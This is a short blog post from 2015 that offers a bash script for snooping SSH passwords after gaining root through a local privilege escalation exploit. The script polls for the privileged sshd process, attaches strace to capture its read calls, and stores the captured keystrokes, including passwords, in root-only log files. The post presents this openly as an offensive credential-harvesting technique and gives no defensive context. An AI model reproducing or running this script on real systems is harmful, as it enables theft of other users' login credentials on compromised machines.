Thursday, October 1, 2015

SSH Snooping in action

Got root via local privilege escalation exploit? Want his password, but can't crack?

You may try ssh snooping..

#!/bin/bash

while true; do
   ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '`
   if [ -n "$ps_test" ]
   then
     f=$RANDOM
     a="output$RANDOM.log"
     strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f
     cat $f | grep 'read(6,' > $a
     rm $f
     chown root:root $a
     chmod 600 $a
   else
     echo -e ".\c"
     sleep 0.1
   fi
done